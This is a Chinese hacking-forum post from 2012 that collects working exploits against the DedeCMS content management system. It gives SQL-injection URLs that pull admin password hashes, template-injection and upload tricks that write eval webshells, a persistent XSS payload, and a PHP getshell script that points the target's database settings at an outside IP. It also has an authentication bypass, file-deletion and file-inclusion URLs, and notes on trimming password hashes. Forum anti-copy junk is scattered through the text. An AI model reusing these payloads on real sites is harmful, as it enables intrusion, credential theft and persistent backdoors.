找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3152|回复: 0
打印 上一主题 下一主题

dedecms漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 10:42:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

' |, l5 e4 o/ n% V2 b' vDedecms 5.6 rss注入漏洞
$ K8 Z6 H8 ]8 V% b# r
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=12 S, f) E; ?9 ]/ a
& p: H6 K& q5 }4 A) Y6 E, @

( H* ^1 D. l: \5 J5 |0 v
! K% w$ N5 f- P! R" \8 x3 Q
9 D9 Q4 A$ u* D7 W5 a2 L4 ~" v$ U: v8 J/ }  L
5 A  A/ b. Z# y( @/ Y

7 R; D! N/ ^. c
& M( {; t) O5 w; V. [5 b7 nDedeCms v5.6 嵌入恶意代码执行漏洞! J% _6 t0 f2 ]& ~3 a
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}' Z) k4 x5 o$ J  s3 u
发表后查看或修改即可执行! r) ]3 p5 t5 ~% p% r8 T/ G
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
1 L+ w$ H# }; |9 b生成x.php 密码xiao,直接生成一句话。
/ c$ l' N, ?1 w3 C3 Z6 K
& K% w0 A6 m, v( E3 r6 ?! [0 Q  @4 h: i, s+ h2 W/ I# [
& p9 a% G: A4 y
* G/ L9 A2 j+ `7 p& p+ M
9 I2 H0 y/ ^7 K  {2 ^: y/ y: I
$ F7 I& W5 d: H+ Q3 Y
+ A" T! {( e: ~' B  w! q% g. I
* ?3 M0 L) Z" G# B
Dede 5.6 GBK SQL注入漏洞& B# }4 i" a. \0 x7 P& }  t
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';& e& M* n" G! S$ Y6 s# J4 d6 F4 M
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe+ K% s, g0 m8 ^$ M$ l2 [0 \$ H
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
6 e6 I: s! i% A1 ~: Q, s  M! ?4 J9 v: Q8 q+ ]3 f1 {- a" y8 u# n5 H
% o! z+ X- `; X/ @0 Q9 l
  r! g# B/ L. L: L" _. W

! H; K( c- K/ X: I, W6 S- b7 [3 [  M0 c% ?8 ^) q
2 k( i4 F- j, Q$ S, l3 N

8 W! G1 f( B1 ~3 c6 }, `, I$ i( _. M: h' F8 Z
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞( U4 p7 Y' T2 P$ s5 K/ \
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
% U: \+ |% p: H# _- r
6 V9 r+ E0 K( M4 D  [4 {/ ~# Y8 [- j4 P! z+ p: L$ n0 l

, Z2 X4 p5 e1 l$ o; k! W5 F5 W% j  n# L* G9 \% V

$ b: s! L. u2 v9 R+ g0 D/ q+ I/ }
7 ^& ~8 p; }6 s1 WDEDECMS 全版本 gotopage变量XSS漏洞
' D4 Y, y: b4 G1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 + o* u4 v6 z- I& t
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
1 H3 m8 V, d) ~* a- u& l, W; V1 j' `) _
: c, r! g- J" j! v. G
& h, E- B: K, {: g2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。   r  c7 J. {8 q8 j' v7 Y
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda4 \1 f/ ]' F0 J( }' G$ y$ O5 c
0 ~. ~$ [/ v& F8 R2 D9 q, ?. i5 Z
+ `7 d% [4 i6 B* I6 g4 a/ v
http://v57.demo.dedecms.com/dede/login.php, K: e0 a. E6 y( h' c. Z

8 x) _: A/ |% q) t% N9 R: c! h7 x- X3 v: f1 H# I/ o
color=Red]DeDeCMS(织梦)变量覆盖getshell
' G. W4 M. J3 l( @! U% C#!usr/bin/php -w
+ d$ F9 t8 V+ B& F" t5 O<?php6 v; |# h9 m2 M& c) r1 t
error_reporting(E_ERROR);! {- D" [8 d/ k: a# Q5 z
set_time_limit(0);0 s* N4 H+ Y: c% V5 N( D2 l
print_r('
- e: @" g+ ]* h- v1 v( x# O# `/ YDEDEcms Variable Coverage! l2 K* g0 I- v7 x% K2 f) S% c, R3 e( W
Exploit Author:
www.heixiaozi.comwww.webvul.com
) H7 l# o4 R0 Z);
7 P, o4 A; e9 Z( |echo "\r\n";/ E2 e; g+ C* p/ B7 X5 s
if($argv[2]==null){
) Q" Z4 x( N3 v' ~3 c, a- l2 zprint_r('
4 P  K0 e2 W) a+ j+---------------------------------------------------------------------------+, X5 P2 ?+ ~# Q0 u3 k8 M
Usage: php '.$argv[0].' url aid path
2 }; Y8 d* n' f% s# kaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
( s( k9 J, H1 c2 j4 aExample:8 \8 c0 l( n+ M4 |+ H5 O
php '.$argv[0].'
www.site.com 1 old
+ z; X' P$ @! k( T6 u! r+---------------------------------------------------------------------------+/ ?2 b1 i- i2 u: H5 d0 ], ~9 X
');
8 Z$ G$ C5 s& y. z& ]: Yexit;4 k& M2 r1 I; Y/ p$ E2 t
}
  w7 c: X$ M8 E& A) }) V4 M$url=$argv[1];
! _8 q% V. [& S$aid=$argv[2];6 L% f3 K0 Q/ U+ l1 S6 p. l, F
$path=$argv[3];9 o9 a, Q; Y, O& n8 J( D: Z" E
$exp=Getshell($url,$aid,$path);
* d( T; v# ~5 |if (strpos($exp,"OK")>12){
0 ]$ J$ }& I% E6 Z8 X4 pecho "
* q0 a- Z6 J4 D4 C  `' u% iExploit Success \n";8 C7 u8 Z5 x# d7 o$ v0 t: n2 h
if($aid==1)echo "
1 l# V: r0 r' nShell:".$url."/$path/data/cache/fuck.php\n" ;6 Z/ }& ?8 _; ]" l% Q* l( {

& t+ M* w, w( ]  s- [6 B: e
" u) L( a8 t" d1 T9 _; i) {: gif($aid==2)echo "
: l6 M& }9 z! m7 i7 Q% YShell:".$url."/$path/fuck.php\n" ;/ e( z8 s; x! P% `% g4 ?; V9 l
9 Y* O% H: I# f" M1 u: d+ g

# E- o$ T# d: \- X% Lif($aid==3)echo "* M8 p$ [3 E2 l6 @5 ^
Shell:".$url."/$path/plus/fuck.php\n";
" r1 ?6 O! q' L9 a* n9 O/ w, e% _7 J: c6 q- P+ b! }

& F& F4 W/ b# ?}else{7 ^/ }8 |  _3 y& S6 q( O: j
echo "; b9 ]; b! N1 Z: q, m" k
Exploit Failed \n";3 [5 v0 }( _  K& d
}5 B* Y8 j$ z4 ]- [8 P
function Getshell($url,$aid,$path){) W$ g6 @0 n9 o% C; z6 O6 ^* c. l
$id=$aid;
1 ]& E$ I/ D! Q4 W% y$host=$url;
* A0 d* R+ ]" B, i) W2 c$port="80";
) t4 R* x" n$ [2 d( ?$ a$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
, [( K; h9 R, o. Y8 [$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";$ s8 L# M  g2 ~: `
$data .= "Host: ".$host."\r\n";; G' z' a$ A2 y/ Z  Z" ]- w3 F( P, u
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
; t# ?$ M4 x! G  o$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
6 w5 @/ T1 d; o. g) T, o$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";( Y7 S3 n5 A6 \$ j# |+ t2 R
//$data .= "Accept-Encoding: gzip,deflate\r\n";7 T0 C4 u5 c0 W& t8 V# a8 z# C: ~
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
# _( o# O5 Z. r/ S& H$data .= "Connection: keep-alive\r\n";
8 L7 j) ?# W4 L$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
3 P% f' x, ~4 B6 }7 R% {* E$data .= "Content-Length: ".strlen($content)."\r\n\r\n";2 [# w  d$ D: a8 S, K* g
$data .= $content."\r\n";9 A3 X3 S1 i4 J2 V( p8 @; W
$ock=fsockopen($host,$port);/ q" t. R  P( k  j  S( K' j8 @
if (!$ock) {2 Z8 s# r' S. s6 D
echo "5 a6 K/ p# z0 m# F
No response from ".$host."\n";
7 _1 C8 o2 C! F: n7 G* H}
  z8 R! Y- q0 ]& g/ Xfwrite($ock,$data);
' C; s  o& P1 ]  j( l- C4 Fwhile (!feof($ock)) {
1 e0 a5 e) _3 J& j2 O) i$ D$exp=fgets($ock, 1024);) l# @4 B; Y* ~$ y* U4 C
return $exp;& c  v! g3 v, S9 _. j! C
}5 ?6 m7 o: s: b$ E5 ?7 o9 Q+ O' s8 b
}) D* i4 C6 [: v: Y  Q, R7 M
7 K1 E7 D2 U- c
% Z* Y" U8 F' i3 X! g  I
?>
9 o5 y+ `* I/ K6 J
' y0 y- X" g6 Z, I* t% d% M2 d' n/ t, u+ x+ F, o* P

5 W! H& V& h- j2 R% O  a' B- L1 N$ R0 Q1 a7 Z- x0 D
$ V$ C" g1 N, A+ s. b+ ^
4 c2 \- z) V/ q/ c0 ^

; s) X8 P) J7 r$ B2 J0 a2 c' @: L) N7 d
7 G: o$ j7 g3 X% l+ F; X

, o4 Z$ m6 W9 H% W/ M+ wDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
8 ?6 m3 L" O+ D' c* |2 \0 U# y
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root9 n( h! T& g: V; ]; V

6 H$ B; h6 q' H3 x: t4 Z" O, _. ^2 \8 f1 q
把上面validate=dcug改为当前的验证码,即可直接进入网站后台3 I& o+ r4 H8 Z$ s
) i4 k( `0 ~# x
4 F( P! m4 h9 D9 b+ V9 C
此漏洞的前提是必须得到后台路径才能实现8 w1 Q. b5 D, Z8 l+ P+ t% o
1 P& o$ R: f' P  J
8 N7 M- R, l% Y9 T; n( K' [% D

0 S2 y( v$ [! M+ u! |4 M# L; k
/ T) N3 b6 |. [7 n: A# Y
8 l2 k4 [; K* T# m/ b1 Z. D4 B
5 M: j3 ?+ e8 ^" @& ]
9 t, F: J. Y6 m, w; h& i# T1 D# C( H6 \5 Q: S

4 A, ^3 E! H5 P4 q. h2 L& @, @" L8 M5 O; V; p6 t& w  P+ c
Dedecms织梦 标签远程文件写入漏洞: C/ i. w! O* a$ d& t/ e+ T
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');8 ]* l/ l  Z! G. S3 h  S. L

; Y* P8 I  b5 N* ^2 r2 V4 A# k4 Y+ {( J
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
  X: B& n% \& x1 |) F; h3 B<form action="" method="post" name="QuickSearch" id="QuickSearch">
, w3 W0 J& h, l7 [8 y8 a* T* _' s<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />0 E: O$ y+ m2 `
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
9 i% R/ d7 O1 z7 t0 D& p2 L/ L<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
( |! x7 D6 ~0 {& H. n% x<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
0 M7 l# B3 r3 f" U3 H, s1 K8 F: V<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />: y% L6 m  [1 U: m7 F( l
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
$ @/ e! Q" z" y% o<input type="text" value="true" name="nocache" style="width:400">3 `; I6 l7 c/ _  J; O, ^! L
<input type="submit" value="提交" name="QuickSearchBtn"><br />( G; ^  U: a$ ?! b% U
</form>
, t/ t8 X! n+ A" E& c% ~. I% v<script>
. l' `' J9 o7 Q8 k9 U: Vfunction addaction()8 H/ F6 z: k! D! p& B4 `; _
{
% ?6 T7 u! e5 c% H) @$ O0 A/ Adocument.QuickSearch.action=document.QuickSearch.doaction.value;
" u3 Y9 d3 Z7 C" v) b8 t- e1 y}# v' l; v  I8 d# D' h, T
</script>$ q: F3 c! [# A0 R
0 R' Y" P* p# U& a$ e# X6 T% v' _
6 b6 F& x4 u( [( z1 z
* Q) u& e4 z$ N6 x2 y8 G' O

; h8 p: _& W3 E+ ?- J+ [  J! R
# t4 |; K2 l2 s
5 u7 m! p; H( r( g6 z( m1 f0 `
! {) U( Y) l* d& J( A  [+ {+ H
. s% Q$ I2 O' V0 U* ~
2 _! E" a6 @  j# @9 @
; f2 s( `. w% ]; R6 [  O3 \, ODedeCms v5.6 嵌入恶意代码执行漏洞
7 w% v# T3 a- j, `1 S& n7 i注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
- n5 T# N/ @3 x: _/ ?7 h  i$ P, @a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
9 [* c& W" l: y2 b生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得! s" g  h2 ^# }3 r/ v1 `
Dedecms <= V5.6 Final模板执行漏洞
7 }4 D! @4 Y6 O# T' A注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:/ }: p$ F3 g: N
uploads/userup/2/12OMX04-15A.jpg9 B5 F) c2 {$ V; z$ N. k

. h8 z6 t# i7 d, R2 k" c  w! Q! p# Z5 P- f' W( Q% \: M
模板内容是(如果限制图片格式,加gif89a):
! n  e6 }6 S) ?6 d{dede:name runphp='yes'}
8 I0 l9 c7 d8 {1 C) G* p$fp = @fopen("1.php", 'a');
2 B# L/ B( U" a4 a@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
6 J$ n8 v+ H, M# w+ U% D@fclose($fp);4 H& t5 \, r0 P1 Q4 _( V3 \
{/dede:name}
: L% W5 m" m% H! n2 R4 g2 修改刚刚发表的文章,查看源文件,构造一个表单:
  z; ]4 }5 f$ H8 @* B# _; @; B<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
- v- u+ ~/ {/ D<input type="hidden" name="dopost" value="save" />' W" T* E/ ]3 |2 R' {! f+ n
<input type="hidden" name="aid" value="2" /># K( k2 d9 c8 P- [" B" ]! f" N3 D
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
' _5 r; x# X. M9 Z! _1 i1 [' e<input type="hidden" name="channelid" value="1" />
/ S* ~% b0 u" O2 {% s<input type="hidden" name="oldlitpic" value="" />9 z; {+ a& m: C2 L' P8 ]8 q
<input type="hidden" name="sortrank" value="1275972263" />
( O+ j' U- ~8 Q3 N7 P
7 S8 k, M' j7 {( Q1 ?: K
7 j9 H3 q8 O# I6 t1 J' ?<div id="mainCp">
. @# o7 G4 h, ~; N' A<h3 class="meTitle"><strong>修改文章</strong></h3>( u% b9 U( `. c0 A. B8 Z

) }: g2 ~1 b: E  P& ^4 W  L4 P; e9 O8 u; ^% f8 D& W( J5 Q# L0 \
<div class="postForm">
+ P) o9 `9 k9 z<label>标题:</label>
8 i5 K- }4 U$ E<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
* U$ h5 H/ z$ H* l8 `! K
% P, |; ~( H( i$ Q/ s# L& q: ?3 i) i
<label>标签TAG:</label>4 o: F/ o  x# K7 C8 I) ^7 ~
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
" R% L% z: ^/ p( [; \0 Z! V* e  N# F* y
5 J; F  K6 H) c2 z
<label>作者:</label>
" |& E  u) B; o# J( U<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>  `% }) ^$ ]0 j: ^% j3 X
" ~: v' e3 I- s* A8 o

% \+ R" b+ j& |<label>隶属栏目:</label>
3 V- S# E1 ~- C; b; }. `; W<select name='typeid' size='1'>: u7 q  q0 V' S+ g% \
<option value='1' class='option3' selected=''>测试栏目</option>
9 t* g7 M* P! ^% c  g9 t</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
" f8 M  n5 l3 W* P$ R) E! b5 k6 l6 G* x  A- b6 Z# O

0 m, F( M2 u# s( U6 P% o* U) r<label>我的分类:</label>
( b# Y8 Z) h: R2 `" r% K4 q* Z4 S<select name='mtypesid' size='1'>0 `+ |; i5 N- ^
<option value='0' selected>请选择分类...</option>9 c# N$ p! c& S; ^
<option value='1' class='option3' selected>hahahha</option>
+ o- H$ `; x* G9 C4 b</select>$ j7 d2 Z. K4 q( W. c$ a

) I( N. b$ ?  {5 }% s2 s9 Y0 ?! m: o$ C- [$ x. O
<label>信息摘要:</label>
. \! }8 c3 D$ B3 T<textarea name="description" id="description">1111111</textarea>
0 u7 B' i6 w! i7 v. ^+ F' B* B(内容的简要说明)
" Q' W$ g) d( p7 g  G1 S! }* {0 M& w) k) g8 i) i
* E; U1 J' U, p; i1 p
<label>缩略图:</label>5 h2 h! n2 l6 S9 m* C
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>/ A, x4 S4 m  B0 L5 p4 t% t$ T; O( J

/ ~: y! \5 @- N4 M9 `; Q4 l6 {' X$ }  J0 c: T( Y
<input type='text' name='templet'
- @5 H5 @$ g2 b$ nvalue="../ uploads/userup/2/12OMX04-15A.jpg">
) D! g  `* A9 O7 _$ x<input type='text' name='dede_addonfields'
' d3 S( ~! Z2 ]0 B  |, Y$ Nvalue="templet,htmltext;">(这里构造). w/ R) @/ V" R9 M  k/ a
</div>' h* Z* K7 `2 {" N

6 {! r/ y0 h# h5 a( T, \8 ^3 }6 E3 K" q- f. n! x
<!-- 表单操作区域 -->
7 g- ]0 q. f) i# |# y" l<h3 class="meTitle">详细内容</h3>, }: F( @6 S% ^& U0 w4 W$ H( g
2 A3 k; t' B' W7 P

: |! Y' O8 W$ u2 {0 S<div class="contentShow postForm">
! L0 w% b" r" g2 x" |& K6 p" S<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
$ F8 n7 ]/ o5 t" _
1 e3 {5 ?  E, P+ r2 r( u' ]. `! \
  C" M* u1 {, Y: O: S<label>验证码:</label>
1 N$ v7 g5 O% H8 C<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
$ G0 \* o5 u  q: ~<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
% M2 E1 B4 q8 d2 n7 ?
! t, ^: Q, w" \' ^
( r: }' m5 Z' q$ A: y4 p/ C$ u<button class="button2" type="submit">提交</button>: Z& [/ R+ T$ s1 u! p9 i1 r" i9 U
<button class="button2 ml10" type="reset">重置</button>6 I- Q" A' D* x2 d' E8 m
</div>
. {6 U+ O* f9 r# t7 w5 M# h( \" d2 h$ i( L8 W8 ]7 d

& d, C/ N5 }9 z: d</div>! y. s$ k3 }  E$ P8 n

% w2 l; {! j& p8 O
( U# w# y4 R& W# V( n" s) @3 |6 x</form>: _% ^  s+ e" X3 w7 Z5 `# l; ~

' m, r( Q- u- a6 Z0 i  g9 D8 S
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
$ `: y- l! o4 g* t7 I假设刚刚修改的文章的aid为2,则我们只需要访问:
* g, `/ B! B& c# P, d. t4 p5 j% Z
http://127.0.0.1/dede/plus/view.php?aid=28 C7 d* D9 R4 v# {, n, P, r
即可以在plus目录下生成webshell:1.php
0 Q, c& o+ `, M- q9 l# K6 N. f' a% X' @

( O. F- b3 r* h6 m( }: E
; z, m4 k% @$ C/ n3 T0 @% L2 w! F: _7 O6 d, Y
' b! i' y$ g2 x9 c) u( @2 q  {: C' G
. f8 R# [& }1 q  l4 H
9 o2 ~' Z$ O8 U$ h3 H" f

; |1 I$ }5 c9 ?- L+ a; e
# A* k1 y7 C- F5 W! j0 ~8 M6 L
6 l( P4 p. i: l) n0 H1 ?2 P  W$ b/ h( ?6 Q0 e& J

. l: i3 c% @3 L1 f9 h* yDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)" ]7 W; f: u- Z/ @2 j+ |( ^
Gif89a{dede:field name='toby57' runphp='yes'}0 T5 U% r. j8 P: n* r4 b* l' ]
phpinfo();
1 Q' n; g# E6 d4 G: `" P' A7 O{/dede:field}0 {( @  @5 s  Z4 `+ z+ S
保存为1.gif
" P; Y; \$ O$ g/ y' P<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> ( F: y. h- }3 a# o3 K
<input type="hidden" name="aid" value="7" /> 7 a7 J" J, N8 k. H
<input type="hidden" name="mediatype" value="1" />
5 |; M5 P4 S1 ?3 S0 O<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
+ ]0 `2 q' k9 A. j<input type="hidden" name="dopost" value="save" />
' O5 n! X$ T6 @. [<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
, _0 W5 x- _2 `, v# l<input name="addonfile" type="file" id="addonfile"/>
+ w% C: R9 T4 ~1 Z0 S3 }: Z<button class="button2" type="submit" >更改</button>   f/ g) e/ V/ Q8 n8 R, r
</form>
/ T1 q8 x7 N6 n. G6 @# k: a2 H% Z1 c$ @& a; \! d, p; I4 W

" ^% u6 t/ L, V构造如上表单,上传后图片保存为/uploads/userup/3/1.gif1 g+ ^: u( M( n- {
发表文章,然后构造修改表单如下:" Q1 o% [6 j& b7 B

1 D1 Z1 _7 {& A+ E# I- t
; k8 H. V9 l, ?$ F0 r<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
0 Z! ~: V6 c* O1 q5 Y<input type="hidden" name="dopost" value="save" /> . `6 O; Y! r3 i8 O9 I; M
<input type="hidden" name="aid" value="2" />
9 V2 H0 D3 t" z. z  d; I<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
( w; Z' Z' v9 I, \<input type="hidden" name="channelid" value="1" /> + P0 C" }! L  b* n( ?# F
<input type="hidden" name="oldlitpic" value="" />
0 T) X. Q! b/ v2 b* e+ P' s: ?* V7 R<input type="hidden" name="sortrank" value="1282049150" />
# M- G! K4 d% e5 I; v2 K/ ~<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> ) P5 w' e! f: ]: |* r
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> ; x3 E0 v' e5 c7 a5 |/ b' @
<select name='typeid' size='1'> - r' p6 K, v; x8 F! g
<option value='1' class='option3' selected=''>Test</option> 2 r# A2 L" @" K8 R6 p) X
<select name='mtypesid' size='1'>
. [4 L$ D( s6 U1 x<option value='0' selected>请选择分类...</option>
9 J5 n8 r! q; k6 d<option value='1' class='option3' selected>aa</option></select>
( F5 P  @7 ]+ R$ w% b<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> " M# Y( O2 T: [- R8 a" ~) O
<input type='hidden' name='dede_addonfields' value="templet">
# V) \% Z; E4 _<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> * O; @' |2 b, a
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
) s( [; c5 n$ Z' T& M<button class="button2" type="submit">提交</button>
5 D% h9 V# N( z  [; F" V9 h( x) b</form>, X0 f& Y( @& @

( X" Q; D9 `* w, X
2 S) s& _! Y& m0 e" n5 N3 K7 H5 B' o& O* J
/ l4 `: x: y( Q4 o8 d8 h9 V

! T/ R) w' E$ D4 h- \5 }$ ~$ C. |
- J7 U3 p, D, o/ Y$ [
. }7 x, |' `4 A3 s9 v$ |& l6 u: `$ r& q. ^; z/ K

9 f' w- L! g; J2 R7 A
2 r: u( B8 r: ?/ l9 m1 P9 }- s, x5 q/ Q0 V& P% x# B/ z# i

" h# I1 P7 ]3 S$ B- K# H) \织梦(Dedecms)V5.6 远程文件删除漏洞+ h5 F' P9 ?9 o2 y
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
+ L4 G) n) c3 z2 |: y, J
' u. c* Z& b8 x+ X' ?; \3 Q, \4 r7 e8 C! J5 y

( M! w- F& T& b
7 c9 J# q; D& `  l3 B- S2 S+ W5 [( N0 T) A7 x9 R8 k
0 l4 B% A, l5 ?, n1 ^
- S3 g0 W7 {9 G9 j# f' K, U
9 U2 v' V2 p+ p0 @6 f' s4 _
4 f2 H3 @3 w8 L+ ~2 r6 _
* \7 m" B- f; N. c1 V
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
2 d- U! b1 U  Y  Q- w; J
http://www.test.com/plus/carbuya ... urn&code=../../# J$ j( K& }+ M9 y$ v
& M. j+ N2 c7 D

! Q4 ^1 \* m5 R+ L3 Y) v3 _! Z& ^/ E/ X9 c

- J$ o* k  [2 v& G9 E1 x; x' Q$ v2 q! p/ ?

3 U4 u$ x! S0 v7 n+ w' q# k4 S0 l: ^5 f1 ?
: {2 v7 Q+ D3 }* E& o
$ J, u) G' u  K9 q$ ~. H; G

# ~" M5 I2 _; XDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
0 |4 _3 o0 J$ U$ V. `plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
4 E: ?: B' P1 W4 J0 e; y9 n密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
5 R% ?% G: x$ u& L
- ^& h- M2 ]0 D$ P6 y. W0 y0 o2 k/ D% b. c% b
6 w' _/ u! M5 r+ J& u
4 [( K8 w$ j  R1 b$ o7 t
# F/ Q" C3 w$ f: {+ i: g
% N. g+ R/ l% o, M! g

( W" Q7 O+ t4 K7 z+ z  q
$ s% k7 F$ ~) m  y: v0 |+ ^6 c9 ~5 E+ A) v" m, J. O
7 a3 E( y6 A' }4 {" W5 V
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
